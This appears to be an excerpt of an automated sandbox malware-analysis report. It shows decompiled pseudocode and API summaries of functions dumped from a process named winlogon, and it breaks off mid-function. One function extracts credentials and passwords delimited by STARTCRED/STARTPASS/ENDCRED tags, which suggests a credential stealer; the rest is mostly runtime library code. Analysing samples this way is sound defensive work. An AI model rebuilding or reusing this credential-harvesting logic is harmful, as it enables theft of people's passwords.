    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D636A0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 189
    C-Code - Quality: 90%
    			E00D636A0(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v68;
				intOrPtr _v72;
				char _v92;
				char _v348;
				char _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				signed int _t59;
				signed int _t60;
				intOrPtr _t73;
				intOrPtr _t74;
				short* _t81;
				short* _t83;
				void* _t103;
				intOrPtr _t104;
				intOrPtr _t114;
				void* _t118;
				void* _t119;
				char _t126;
				intOrPtr _t127;
				intOrPtr _t128;
				void* _t131;
				intOrPtr _t133;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t121 = __edx;
				_push(0xffffffff);
				_push(E00D7E1F8);
				_push( *[fs:0x0]);
				_t136 = _t135 - 0x25c;
				_t59 =  *0xd88004; // 0x276b9783
				_t60 = _t59 ^ _t134;
				_v20 = _t60;
				_push(__edi);
				_push(_t60);
				 *[fs:0x0] =  &_v16;
				_v616 = __ecx;
				if(__ecx == 0 || __edx == 0) {
					goto L28;
				} else {
					 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx));
					E00D67980( &_v92, __edi, __edx);
					_v8 = 0;
					_t126 = 0;
					while(1) {
						_t103 = E00D67E20( &_v92, L"<STARTCRED>", _t126, 0xb);
						_t131 = E00D67E20( &_v92, L"<STARTPASS>", _t126, 0xb);
						_t127 = E00D67E20( &_v92, L"<ENDCRED>", _t126, 9);
						if(_t103 == 0xffffffff || _t131 == 0xffffffff || _t127 == 0xffffffff || _t103 >= _t131 || _t131 >= _t127) {
							break;
						}
						_t73 =  *0xd85d6c; // 0xb
						_t114 =  *0xd85d70; // 0xb
						_v608 = _t127;
						_t121 = _t131 - _t114 - _t103;
						_v608 = _v608 - _t73;
						_v608 = _v608 - _t131;
						_t74 =  *0xd85d68; // 0x9
						_v612 = _t74 + _t127;
						E00D67900( &_v92,  &_v68, _t114 + _t103, _t131 - _t114 - _t103);
						_v8 = 1;
						E00D67900( &_v92,  &_v44, _t131 + _t73, _v608);
						_v8 = 2;
						_t104 = _v48;
						_t128 = _v52;
						_t81 =  >=  ? _v68 :  &_v68;
						_t118 = 0;
						if(_t128 == 0) {
							L11:
							_t133 = _v24;
							_t121 = _v28;
							_t83 =  >=  ? _v44 :  &_v44;
							_t119 = 0;
							if(_t121 == 0) {
								L15:
								if(_v608 >= 0x20 || _t128 >= 0x100 || _t121 >= 0x100) {
									L20:
									if(_t133 >= 8) {
										_t44 = _t133 + 1; // 0x8
										E00D682E0(_t104, _t121, _t128, _v44, _t44);
										_t104 = _v48;
									}
									_t126 = _v612;
									_v24 = 7;
									_v28 = 0;
									_v44 = 0;
									_v8 = 0;
									if(_t104 >= 8) {
										E00D682E0(_t104, _t121, _t126, _v68, _t104 + 1);
									}
									continue;
								} else {
									E00D6D520(_t128,  &_v604, 0, 0x200);
									_t92 =  >=  ? _v68 :  &_v68;
									E00D6EAB8( &_v604,  >=  ? _v68 :  &_v68, 0xff);
									_t96 =  >=  ? _v44 :  &_v44;
									E00D6EAB8( &_v348,  >=  ? _v44 :  &_v44, 0xff);
									_t136 = _t136 + 0x24;
									E00D62540(_t104, _v616, _t128,  &_v604);
									_t104 = _v48;
									L19:
									_t133 = _v24;
									goto L20;
								}
							}
							while( *_t83 >= 0x20) {
								_t119 = _t119 + 1;
								_t83 = _t83 + 2;
								if(_t119 < _t121) {
									continue;
								}
								goto L15;
							}
							goto L20;
						}
						while( *_t81 >= 0x20) {
							_t118 = _t118 + 1;
							_t81 = _t81 + 2;
							if(_t118 < _t128) {
								continue;
							}
							goto L11;
						}
						goto L19;
					}
					_t69 = _v72;
					if(_v72 >= 8) {
						E00D682E0(_t103, _t121, _t127, _v92, _t69 + 1);
					}
					L28:
					 *[fs:0x0] = _v16;
					return E00D6ABE4(_v20 ^ _t134);
				}
			}






































    0x00d636a0
    0x00d636a3
    0x00d636a5
    0x00d636b0
    0x00d636b1
    0x00d636b7
    0x00d636bc
    0x00d636be
    0x00d636c3
    0x00d636c4
    0x00d636c8
    0x00d636ce
    0x00d636d6
    0x00000000
    0x00d636e4
    0x00d636e6
    0x00d636ed
    0x00d636f2
    0x00d636f9
    0x00d63700
    0x00d6371b
    0x00d6372d
    0x00d63734
    0x00d63739
    0x00000000
    0x00000000
    0x00d63761
    0x00d63768
    0x00d63770
    0x00d63776
    0x00d63778
    0x00d63780
    0x00d63788
    0x00d63790
    0x00d6379e
    0x00d637ac
    0x00d637b5
    0x00d637ba
    0x00d637c1
    0x00d637c7
    0x00d637ca
    0x00d637ce
    0x00d637d2
    0x00d637e6
    0x00d637e6
    0x00d637ec
    0x00d637f2
    0x00d637f6
    0x00d637fa
    0x00d63812
    0x00d63819
    0x00d63892
    0x00d63895
    0x00d63897
    0x00d6389e
    0x00d638a3
    0x00d638a3
    0x00d638a6
    0x00d638ae
    0x00d638b5
    0x00d638bc
    0x00d638c0
    0x00d638c6
    0x00d638d3
    0x00d638d3
    0x00000000
    0x00d6382b
    0x00d63839
    0x00d63849
    0x00d63855
    0x00d63866
    0x00d63872
    0x00d63883
    0x00d63887
    0x00d6388c
    0x00d6388f
    0x00d6388f
    0x00000000
    0x00d6388f
    0x00d63819
    0x00d63800
    0x00d6380a
    0x00d6380b
    0x00d63810
    0x00000000
    0x00000000
    0x00000000
    0x00d63810
    0x00000000
    0x00d63800
    0x00d637d4
    0x00d637de
    0x00d637df
    0x00d637e4
    0x00000000
    0x00000000
    0x00000000
    0x00d637e4
    0x00000000
    0x00d637d4
    0x00d638dd
    0x00d638e3
    0x00d638ea
    0x00d638ea
    0x00d638f8
    0x00d638fb
    0x00d63913
    0x00d63913

    APIs
    • __Stoull.NTSTC_LIBCMT ref: 00D63855
    • __Stoull.NTSTC_LIBCMT ref: 00D63872
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D72D35, Relevance: 10.7, APIs: 7, Instructions: 152file
    C-Code - Quality: 73%
    			E00D72D35(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0xd88004; // 0x276b9783
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xd91260 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xd91260 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00D76F28(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xd91260 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xd91260 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xd91260 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00D73BE9( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00D73BE9();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00D6ABE4(_v8 ^ _t136);
			}


































    0x00d72d3d
    0x00d72d44
    0x00d72d47
    0x00d72d4f
    0x00d72d53
    0x00d72d5f
    0x00d72d62
    0x00d72d65
    0x00d72d6c
    0x00d72d74
    0x00d72d77
    0x00d72d7d
    0x00d72d83
    0x00d72d88
    0x00d72d8a
    0x00d72d8d
    0x00d72d92
    0x00d72d9c
    0x00d72da3
    0x00d72da6
    0x00d72dad
    0x00d72db4
    0x00d72de0
    0x00d72e06
    0x00d72e08
    0x00000000
    0x00d72de2
    0x00d72de5
    0x00d72eac
    0x00d72eb8
    0x00d72ec3
    0x00d72ec8
    0x00d72deb
    0x00d72df2
    0x00d72df7
    0x00d72dfd
    0x00d72e03
    0x00000000
    0x00d72e03
    0x00d72dfd
    0x00d72de5
    0x00d72db6
    0x00d72dba
    0x00d72dbd
    0x00d72dc3
    0x00d72dc5
    0x00d72dc8
    0x00d72dcc
    0x00d72e09
    0x00d72e0c
    0x00d72e0d
    0x00d72e12
    0x00d72e18
    0x00d72e1e
    0x00d72e2d
    0x00d72e33
    0x00d72e39
    0x00d72e3e
    0x00d72e5a
    0x00d72ecd
    0x00d72ed3
    0x00d72e5c
    0x00d72e64
    0x00d72e6d
    0x00d72e73
    0x00000000
    0x00d72e75
    0x00d72e77
    0x00d72e7a
    0x00d72e93
    0x00000000
    0x00d72e95
    0x00d72e99
    0x00d72e9b
    0x00d72e9e
    0x00000000
    0x00d72e9e
    0x00d72e99
    0x00d72e93
    0x00d72e73
    0x00d72e6d
    0x00d72e5a
    0x00d72e3e
    0x00d72e18
    0x00000000
    0x00d72ea1
    0x00d72ea1
    0x00d72ed5
    0x00d72ee7

    APIs
    • GetConsoleCP.KERNEL32 ref: 00D72D77
    • __Stoull.NTSTC_LIBCMT ref: 00D72DF2
    • __Stoull.NTSTC_LIBCMT ref: 00D72E0D
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00D72E33
    • WriteFile.KERNEL32(?,?,00000000,00D734AA,00000000), ref: 00D72E52
    • WriteFile.KERNEL32(?,?,00000001,00D734AA,00000000), ref: 00D72E8B
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00D734AA,?,?,?,?,?,?), ref: 00D72ECD
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6B9C0, Relevance: 9.1, APIs: 6, Instructions: 124
    C-Code - Quality: 64%
    			E00D6B9C0(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				signed int _v12;
				char _v20;
				short* _v28;
				signed int _v32;
				short* _v36;
				int _v40;
				int _v44;
				void* _v60;
				signed int _t23;
				signed int _t24;
				char _t26;
				int _t27;
				void* _t29;
				short* _t30;
				int _t31;
				signed short _t36;
				signed short _t40;
				char* _t45;
				int _t46;
				char* _t48;
				char* _t54;
				int _t56;
				short* _t59;
				signed int _t61;
				void* _t62;
				short* _t63;

				_push(0xfffffffe);
				_push(0xd86878);
				_push(E00D6D240);
				_push( *[fs:0x0]);
				_t63 = _t62 - 0x18;
				_t23 =  *0xd88004; // 0x276b9783
				_v12 = _v12 ^ _t23;
				_t24 = _t23 ^ _t61;
				_v32 = _t24;
				_push(_t24);
				 *[fs:0x0] =  &_v20;
				_v28 = _t63;
				_t45 = _a4;
				if(_t45 != 0) {
					_t48 = _t45;
					_t7 =  &(_t48[1]); // 0xd64854
					_t54 = _t7;
					do {
						_t26 =  *_t48;
						_t48 =  &(_t48[1]);
					} while (_t26 != 0);
					_t8 = _t48 - _t54 + 1; // 0xd64855
					_t27 = _t8;
					_v44 = _t27;
					if(_t27 > 0x7fffffff) {
						_t27 = E00D6B9A0(0x80070057);
					}
					_t56 = MultiByteToWideChar(0, 0, _t45, _t27, 0, 0);
					_v40 = _t56;
					if(_t56 == 0) {
						_t40 = GetLastError();
						if(_t40 > 0) {
							_t40 = _t40 & 0x0000ffff | 0x80070000;
						}
						E00D6B9A0(_t40);
					}
					_v8 = 0;
					_t29 = _t56 + _t56;
					if(_t56 >= 0x1000) {
						_push(_t29);
						_t30 = E00D702C9(_t49);
						_t63 =  &(_t63[2]);
						_t59 = _t30;
						_v36 = _t59;
						_v8 = 0xfffffffe;
					} else {
						E00D7D520();
						_v28 = _t63;
						_t59 = _t63;
						_v36 = _t59;
						_v8 = 0xfffffffe;
					}
					if(_t59 == 0) {
						E00D6B9A0(0x8007000e);
					}
					_t31 = MultiByteToWideChar(0, 0, _t45, _v44, _t59, _t56);
					if(_t31 == 0) {
						if(_t56 >= 0x1000) {
							E00D7009A(_t59);
							_t63 =  &(_t63[2]);
						}
						_t36 = GetLastError();
						if(_t36 > 0) {
							_t36 = _t36 & 0x0000ffff | 0x80070000;
						}
						_t31 = E00D6B9A0(_t36);
					}
					__imp__#2(_t59);
					_t46 = _t31;
					if(_t56 >= 0x1000) {
						E00D7009A(_t59);
					}
					if(_t46 == 0) {
						E00D6B9A0(0x8007000e);
					}
				} else {
				}
				 *[fs:0x0] = _v20;
				return E00D6ABE4(_v32 ^ _t61);
			}






























    0x00d6b9c3
    0x00d6b9c5
    0x00d6b9ca
    0x00d6b9d5
    0x00d6b9d6
    0x00d6b9d9
    0x00d6b9de
    0x00d6b9e1
    0x00d6b9e3
    0x00d6b9e9
    0x00d6b9ed
    0x00d6b9f3
    0x00d6b9f6
    0x00d6b9fb
    0x00d6ba04
    0x00d6ba06
    0x00d6ba06
    0x00d6ba10
    0x00d6ba10
    0x00d6ba12
    0x00d6ba13
    0x00d6ba19
    0x00d6ba19
    0x00d6ba1c
    0x00d6ba24
    0x00d6ba2b
    0x00d6ba2b
    0x00d6ba40
    0x00d6ba42
    0x00d6ba47
    0x00d6ba49
    0x00d6ba51
    0x00d6ba56
    0x00d6ba56
    0x00d6ba5c
    0x00d6ba5c
    0x00d6ba61
    0x00d6ba68
    0x00d6ba71
    0x00d6ba89
    0x00d6ba8a
    0x00d6ba8f
    0x00d6ba92
    0x00d6ba94
    0x00d6ba97
    0x00d6ba73
    0x00d6ba73
    0x00d6ba78
    0x00d6ba7b
    0x00d6ba7d
    0x00d6ba80
    0x00d6ba80
    0x00d6babd
    0x00d6bac4
    0x00d6bac4
    0x00d6bad3
    0x00d6badb
    0x00d6bae3
    0x00d6bae6
    0x00d6baeb
    0x00d6baeb
    0x00d6baee
    0x00d6baf6
    0x00d6bafb
    0x00d6bafb
    0x00d6bb01
    0x00d6bb01
    0x00d6bb07
    0x00d6bb0d
    0x00d6bb15
    0x00d6bb18
    0x00d6bb1d
    0x00d6bb22
    0x00d6bb29
    0x00d6bb29
    0x00d6b9fd
    0x00d6b9fd
    0x00d6bb36
    0x00d6bb4e

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00D64853,00D64855,00000000,00000000,276B9783,00000000,00000000,76FD3F8A,Function_0000D240,00D86878,000000FE,?,00D64853,WQL), ref: 00D6BA3A
    • GetLastError.KERNEL32(?,00D64853,WQL,?,?), ref: 00D6BA49
    • __alloca_probe_16.NTDLLP ref: 00D6BA73
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00D64853,?,00000000,00000000,?,?,?,?,?,00D64853), ref: 00D6BAD3
    • GetLastError.KERNEL32(?,?,?,?,?,00D64853), ref: 00D6BAEE
    • SysAllocString.OLEAUT32(00000000), ref: 00D6BB07
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D70D69, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38library
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D70D5E,00000003,?,00D70CFE,00000003,00D86AA8,0000000C,00D70E11,00000003,00000002), ref: 00D70D89
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,00D70D5E,00000003,?,00D70CFE,00000003,00D86AA8,0000000C,00D70E11,00000003,00000002), ref: 00D70D9C
    • FreeLibrary.KERNEL32(00000000,?,?,?,00D70D5E,00000003,?,00D70CFE,00000003,00D86AA8,0000000C,00D70E11,00000003,00000002,00000000), ref: 00D70DBF
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D75819, Relevance: 7.8, APIs: 5, Instructions: 300file
    C-Code - Quality: 77%
    			E00D75819(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E00D7210F();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E00D72122())) = 9;
						L59:
						_t145 = E00D70269();
						goto L60;
					}
					__eflags = _t213 -  *0xd91460; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0xd91260 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E00D717FF(_t224, _t158);
								E00D717C5(0);
								E00D717C5(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E00D75316(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0xd91260 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0xd91260 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0xd91260 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xd91260 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0xd91260 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xd91260 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0xd91260 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E00D78F9E(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E00D720EC(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00D72122())) = 9;
											 *(E00D7210F()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0xd91260 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E00D75488();
												} else {
													_t176 = E00D75798();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E00D75648(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0xd91260 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00D72122())) = 0xc;
									 *(E00D7210F()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E00D717C5(_t246);
									return _t242;
								}
							}
							L15:
							 *(E00D7210F()) =  *_t206 & _t246;
							 *((intOrPtr*)(E00D72122())) = 0x16;
							E00D70269();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E00D7210F()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E00D72122())) = 0x16;
					goto L59;
				} else {
					 *(E00D7210F()) =  *_t212 & 0x00000000;
					_t145 = E00D72122();
